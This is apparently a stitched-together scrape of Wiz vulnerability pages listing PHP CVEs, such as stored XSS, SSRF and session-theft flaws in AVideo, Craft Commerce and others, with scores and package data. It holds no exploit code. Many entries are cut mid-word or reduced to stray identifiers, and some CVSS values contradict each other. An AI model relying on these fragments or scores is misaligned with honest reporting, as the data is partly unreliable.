As a result, an authenticated user without asset-view permission can still obtain private preview output.This affects Craft installations with authenticated users of mixed privilege levels with private assets.
## Resources
d30df3112220db1ffd6726a3ed11857014c7fb27
b1cddf72c98a
Source : NVD
## 1.3
Score
Published March 26, 2026
Severity LOW
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability P
Wiz
CVE-2026-24765 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2026-24765 [HIGH] CVE-2026-24765 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24765 :
PHP vulnerability analysis and mitigation
cleanupForCoverage()
.coverage
.coverage
allowed_classes
__wakeup()
['allowed_classes' => false]
.coverage
.coverage
Source : NVD
## 7.8
Score
Published January 27, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 31.4
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
phpunit9
phpunit10
Sources
NVD
Alpine 3.18, 3.19, 3.20, 3.21, 3.22, 3.23, edge Severity HIGH No Fix Added at: Mar 03, 2026
Debian 11, 13, 14 Severity HIGH Has Fix Added at: Jan 28, 2026
Debian 12 Severity MEDIUM No Fix Added at: Jan 28, 2026
Echo Severity HIGH Ha
Wiz
CVE-2026-33043 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-33043 [HIGH] CVE-2026-33043 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33043 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 25.0 and below, /objects/phpsessionid.json.php exposes the current PHP session ID to any unauthenticated request. The allowOrigin() function reflects any Origin header back in Access-Control-Allow-Origin with Access-Control-Allow-Credentials: true, enabling cross-origin session theft and full account takeover. This issue has been fixed in version 26.0.
Source : NVD
## 8.1
Score
Published March 20, 2026
Severity HIGH
CNA Score 8.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.3
Exploitation Probability (EPSS) N/A
Affected packages and l
Wiz
CVE-2026-0859 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.2
CVE-2026-0859 [MEDIUM] CVE-2026-0859 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-0859 :
PHP vulnerability analysis and mitigation
TYPO3's mail‑file spool deserialization flaw lets local users with write access to the spool directory craft a malicious file that is deserialized during the mailer:spool:send command, enabling arbitrary PHP code execution on the web server. This issue affects TYPO3 CMS versions 10.0.0-10.4.54, 11.0.0-11.5.48, 12.0.0-12.4.40, 13.0.0-13.4.22 and 14.0.0-14.0.1.
Source : NVD
## 5.2
Score
Published January 13, 2026
Severity MEDIUM
CNA Score 5.2
Affected Technologies
PHP
Typo3
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
typo3/cms-core
cpe:2.3:a:typo3:
Wiz
CVE-2026-32313 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2026-32313 [HIGH] CVE-2026-32313 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32313 :
PHP vulnerability analysis and mitigation
xmlseclibs is a library written in PHP for working with XML Encryption and Signatures. Prior to 3.1.5, XML nodes encrypted with either aes-128-gcm, aes-192-gcm, or aes-256-gcm lack validation of the authentication tag length. An attacker can use this to brute-force an authentication tag, recover the GHASH key, and decrypt the encrypted nodes. It also allows to forge arbitrary ciphertexts without knowing the encryption key. This vulnerability is fixed in 3.1.5.
Source : NVD
## 8.2
Score
Published March 16, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
PHP
Chainguard
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9
Wiz
CVE-2026-25482 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.2
CVE-2026-25482 [MEDIUM] CVE-2026-25482 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25482 :
PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored DOM XSS vulnerability exists in the "Recent Orders" dashboard widget. The Order Status Name is rendered via JavaScript string concatenation without proper escaping, allowing script execution when any admin visits the dashboard. This issue has been patched in versions 4.10.1 and 5.5.2.
Source : NVD
## 6.2
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 6.2
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.6
Exploitation Probability (EPSS) N/A
Affected packages an
Wiz
CVE-2026-34598 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-34598 [HIGH] CVE-2026-34598 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34598 :
PHP vulnerability analysis and mitigation
YesWiki is a wiki system written in PHP. Prior to version 4.6.0, a stored and blind XSS vulnerability exists in the form title field. A malicious attacker can inject JavaScript without any authentication via a form title that is saved in the backend database. When any user visits that injected page, the JavaScript payload gets executed. This issue has been patched in version 4.6.0.
Source : NVD
## 7.1
Score
Published April 2, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 19.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
yeswiki/yeswiki
So
Wiz
CVE-2026-33763 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-33763 [MEDIUM] CVE-2026-33763 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33763 :
PHP vulnerability analysis and mitigation
get_api_video_password_is_correct
passwordIsCorrect
Source : NVD
## 5.3
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 22.2
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 29, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Publi
Wiz
GHSA-fmg6-246m-9g2v Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-fmg6-246m-9g2v Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-fmg6-246m-9g2v :
PHP vulnerability analysis and mitigation
## Impact
In applications built with the Auth0 PHP SDK, cookies are encrypted with insufficient entropy, which may result in threat actors brute-forcing the encryption key and forging session cookies.
## Am I Affected?
You are affected if you meet the following preconditions:
Applications using laravel-auth0 SDK, versions between 7.0.0 and 7.20.0
Laravel-auth0 SDK using the Auth0-PHP SDK versions between 8.0.0 to 8.18.0.
## Resolution
Upgrade Auth0/laravel-auth0 to version 7.21.0 or greater.
Source : NVD
## 8.2
Score
Published April 3, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitat
Wiz
CVE-2026-33238 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-33238 [MEDIUM] CVE-2026-33238 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33238 :
PHP vulnerability analysis and mitigation
listFiles.json.php
path
glob()
.mp4
Source : NVD
## 4.3
Score
Published March 21, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 14.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHS
Wiz
CVE-2026-33541 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-33541 [MEDIUM] CVE-2026-33541 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33541 :
PHP vulnerability analysis and mitigation
TSPortal is the WikiTide Foundation’s in-house platform used by the Trust and Safety team to manage reports, investigations, appeals, and transparency work. Prior to version 34, a flaw in TSPortal allowed attackers to create arbitrary user records in the database by abusing validation logic. While validation correctly rejected invalid usernames, a side effect within a validation rule caused user records to be created regardless of whether the request succeeded. This could be exploited to cause uncontrolled database growth, leading to a potential denial of service (DoS). Version 34 contains a fix for the issue.
Source : NVD
## 6.5
Score
Published March 26, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
Wiz
CVE-2026-35539 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-35539 [MEDIUM] CVE-2026-35539 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35539 :
PHP vulnerability analysis and mitigation
An issue was discovered in Roundcube Webmail before 1.5.14 and 1.6.14. XSS exists because of insufficient HTML attachment sanitization in preview mode. A victim must preview a text/html attachment.
Source : NVD
## 6.1
Score
Published April 3, 2026
Severity MEDIUM
CNA Score 6.1
Affected Technologies
PHP
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
roundcube
roundcube/roundcubemail
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM Has Fix Added at: Apr 05, 2026
Echo Severity MEDIUM Has Fix Added at: Apr 05, 2026
Composer Severity
Wiz
CVE-2026-33681 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-33681 [HIGH] CVE-2026-33681 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33681 :
PHP vulnerability analysis and mitigation
objects/pluginRunDatabaseScript.json.php
name
Plugin::getDatabaseFileName()
install/install.sql
Source : NVD
## 7.2
Score
Published March 23, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.9
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Compon
Wiz
CVE-2026-25759 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-25759 [HIGH] CVE-2026-25759 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25759 :
PHP vulnerability analysis and mitigation
Statmatic is a Laravel and Git powered content management system (CMS). From 6.0.0 to before 6.2.3, a stored XSS vulnerability in content titles allows authenticated users with content creation permissions to inject malicious JavaScript that executes when viewed by higher-privileged users. Malicious user must have an account with control panel access and content creation permissions. This vulnerability can be exploited to allow super admin accounts to be created. This has been fixed in 6.2.3.
Source : NVD
## 8.7
Score
Published February 11, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probabil
Wiz
CVE-2026-34561 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.7
CVE-2026-34561 [MEDIUM] CVE-2026-34561 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34561 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within System Settings – Social Media Management. Multiple configuration fields, including Social Media and Social Media Link, accept attacker-controlled input that is stored server-side and later rendered without proper output encoding. This issue has been patched in version 0.31.0.0.
Source : NVD
## 4.7
Score
Published April 1, 2026
Severity MEDIUM
CNA Score 4.7
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Wiz
CVE-2026-34974 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-34974 [MEDIUM] CVE-2026-34974 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34974 :
PHP vulnerability analysis and mitigation
phpMyFAQ is an open source FAQ web application. Prior to version 4.1.1, the regex-based SVG sanitizer in phpMyFAQ (SvgSanitizer.php) can be bypassed using HTML entity encoding in javascript: URLs within SVG attributes. Any user with edit_faq permission can upload a malicious SVG that executes arbitrary JavaScript when viewed, enabling privilege escalation from editor to full admin takeover. This issue has been patched in version 4.1.1.
Source : NVD
## 5.4
Score
Published April 2, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.5
Exploitation Probability (EPSS)
Wiz
CVE-2026-2897 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-2897 [MEDIUM] CVE-2026-2897 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2897 :
PHP vulnerability analysis and mitigation
A security vulnerability has been detected in funadmin up to 7.1.0-rc4. This vulnerability affects unknown code of the file app/backend/view/index/index.html of the component Backend Interface. The manipulation of the argument Value leads to cross site scripting. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 4.8
Score
Published February 22, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.5
Exploitatio
Wiz
CVE-2026-25485 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.2
CVE-2026-25485 [MEDIUM] CVE-2026-25485 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25485 :
PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, a stored XSS vulnerability in Craft Commerce allows attackers to execute malicious JavaScript in an administrator’s browser. This occurs because the Shipping Categories (Name & Description) fields in the Store Management section are not properly sanitized before being displayed in the admin panel. This issue has been patched in versions 4.10.1 and 5.5.2.
Source : NVD
## 6.2
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 6.2
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS)
Wiz
CVE-2026-34364 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-34364 [MEDIUM] CVE-2026-34364 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34364 :
PHP vulnerability analysis and mitigation
categories.json.php
?user=
?user=
Source : NVD
## 5.3
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 31, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h6r
Wiz
CVE-2026-33351 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-33351 [CRITICAL] CVE-2026-33351 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33351 :
PHP vulnerability analysis and mitigation
plugin/Live/standAloneFiles/saveDVR.json.php
$_REQUEST['webSiteRootURL']
file_get_contents()
Source : NVD
## 9.1
Score
Published March 23, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 24
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity CRITICAL No Fix Added at: Mar 20, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Comp
Wiz
CVE-2026-29175 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-29175 [HIGH] CVE-2026-29175 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29175 :
PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. Prior to 5.5.3, Stored XSS vulnerabilities exist in the Commerce Inventory page. The Product Title, Variant Title, and Variant SKU fields are rendered without proper HTML escaping, allowing an attacker to execute arbitrary JavaScript when any user (including administrators) views the inventory management page. This vulnerability is fixed in 5.5.3.
Source : NVD
## 8.6
Score
Published March 10, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
Wiz
CVE-2026-32600 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2026-32600 [HIGH] CVE-2026-32600 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32600 :
PHP vulnerability analysis and mitigation
xml-security is a library that implements XML signatures and encryption. Prior to versions 2.3.1 and 1.13.9, XML nodes encrypted with either aes-128-gcm, aes-192-gcm, or aes-256-gcm lack validation of the authentication tag length. An attacker can use this to brute-force an authentication tag, recover the GHASH key, and decrypt the encrypted nodes. It also allows to forge arbitrary ciphertexts without knowing the encryption key. This vulnerability is fixed in 2.3.1 and 1.13.9.
Source : NVD
## 8.2
Score
Published March 16, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EP
Wiz
CVE-2026-23626 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2026-23626 [MEDIUM] CVE-2026-23626 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23626 :
PHP vulnerability analysis and mitigation
DefaultPolicy
Source : NVD
## 6.8
Score
Published January 18, 2026
Severity MEDIUM
CNA Score 6.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 18.9
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
kimai/kimai
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Jan 21, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h6rj-3m53-887h
HIGH
Wiz
CVE-2025-69198 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.0
CVE-2025-69198 [MEDIUM] CVE-2025-69198 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-69198 :
PHP vulnerability analysis and mitigation
Pterodactyl is a free, open-source game server management panel. Pterodactyl implements rate limits that are applied to the total number of resources (e.g. databases, port allocations, or backups) that can exist for an individual server. These resource limits are applied on a per-server basis, and validated during the request cycle. However, in versions prior to 1.12.0, it is possible for a malicious user to send a massive volume of requests at the same time that would create more resources than the server is allotted. This is because the validation occurs early in the request cycle and does not lock the target resource while it is processing. As a result sending a large volume of requests at the same time would lead all of th
Wiz
CVE-2026-23997 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.0
CVE-2026-23997 [HIGH] CVE-2026-23997 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23997 :
PHP vulnerability analysis and mitigation
FacturaScripts is open-source enterprise resource planning and accounting software. In 2025.71 and earlier, a Stored Cross-Site Scripting (XSS) vulnerability was discovered in the Observations field. The flaw occurs in the History view, where historical data is rendered without proper HTML entity encoding. This allows an attacker to execute arbitrary JavaScript in the browser of viewing the history by administrators.
Source : NVD
## 9
Score
Published February 2, 2026
Severity CRITICAL
CNA Score 8.0
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.9
Exploitation Probability (EPSS) N/A
Affected pa
Wiz
CVE-2026-33767 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-33767 [HIGH] CVE-2026-33767 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33767 :
PHP vulnerability analysis and mitigation
objects/like.php
getLike()
?
users_id
$this->videos_id
videos_id
Source : NVD
## 7.1
Score
Published March 27, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 16.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 29, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Wiz
CVE-2026-27732 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-27732 [HIGH] CVE-2026-27732 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27732 :
PHP vulnerability analysis and mitigation
aVideoEncoder.json.php
downloadURL
Source : NVD
## 8.6
Score
Published February 24, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 02, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h6r
Wiz
CVE-2025-69210 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 1.2
CVE-2025-69210 [LOW] CVE-2025-69210 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-69210 :
PHP vulnerability analysis and mitigation
FacturaScripts is open-source enterprise resource planning and accounting software. Prior to version 2025.7, a stored cross-site scripting (XSS) vulnerability exists in the product file upload functionality. Authenticated users can upload crafted XML files containing executable JavaScript. These files are later rendered by the application without sufficient sanitization or content-type enforcement, allowing arbitrary JavaScript execution when the file is accessed. Because product files uploaded by regular users are visible to administrative users, this vulnerability can be leveraged to execute malicious JavaScript in an administrator’s browser session. Version 2025.7 fixes the issue.
Source : NVD
## 1.2
Score
Published D
Wiz
CVE-2026-32812 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2026-32812 [MEDIUM] CVE-2026-32812 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32812 :
PHP vulnerability analysis and mitigation
Admidio is an open-source user management solution. In versions 5.0.0 through 5.0.6, unrestricted URL fetch in the SSO Metadata API can result in SSRF and local file reads. The SSO Metadata fetch endpoint at modules/sso/fetch_metadata.php accepts an arbitrary URL via $_GET['url'], validates it only with PHP's FILTER_VALIDATE_URL, and passes it directly to file_get_contents(). FILTER_VALIDATE_URL accepts file://, http://, ftp://, data://, and php:// scheme URIs. An authenticated administrator can use this endpoint to read arbitrary local files via the file:// wrapper (Local File Read), reach internal services via http:// (SSRF), or fetch cloud instance metadata. The full response body is returned verbatim to the caller. This is
Wiz
GHSA-595p-g7xc-c333 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-595p-g7xc-c333 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-595p-g7xc-c333 :
PHP vulnerability analysis and mitigation
## Impact
Source : NVD
## 6.9
Score
Published January 14, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
algolia/algoliasearch-magento-2
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Jan 15, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-
Wiz
CVE-2026-31821 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-31821 [MEDIUM] CVE-2026-31821 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31821 :
PHP vulnerability analysis and mitigation
Sylius is an Open Source eCommerce Framework on Symfony. The POST /api/v2/shop/orders/{tokenValue}/items endpoint does not verify cart ownership. An unauthenticated attacker can add items to other registered customers' carts by knowing the cart tokenValue. An attacker who obtains a cart tokenValue can add arbitrary items to another customer's cart. The endpoint returns the full cart representation in the response (HTTP 201). The issue is fixed in versions: 2.0.16, 2.1.12, 2.2.3 and above.
Source : NVD
## 6.9
Score
Published March 10, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability P
Wiz
CVE-2026-31888 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-31888 [MEDIUM] CVE-2026-31888 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31888 :
PHP vulnerability analysis and mitigation
Shopware is an open commerce platform. Prior to 6.7.8.1 and 6.6.10.15, the Store API login endpoint (POST /store-api/account/login) returns different error codes depending on whether the submitted email address belongs to a registered customer (CHECKOUT__CUSTOMER_AUTH_BAD_CREDENTIALS) or is unknown (CHECKOUT__CUSTOMER_NOT_FOUND). The "not found" response also echoes the probed email address. This allows an unauthenticated attacker to enumerate valid customer accounts. The storefront login controller correctly unifies both error paths, but the Store API does not — indicating an inconsistent defense. This vulnerability is fixed in 6.7.8.1 and 6.6.10.15.
Source : NVD
## 5.3
Score
Published March 11, 2026
Severity MEDIUM
C
Wiz
CVE-2026-33512 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-33512 [HIGH] CVE-2026-33512 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33512 :
PHP vulnerability analysis and mitigation
decryptString
view/url2Embed.json.php
Source : NVD
## 7.5
Score
Published March 23, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 21, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h6rj-
Wiz
CVE-2025-67856 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2025-67856 [MEDIUM] CVE-2025-67856 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67856 :
PHP vulnerability analysis and mitigation
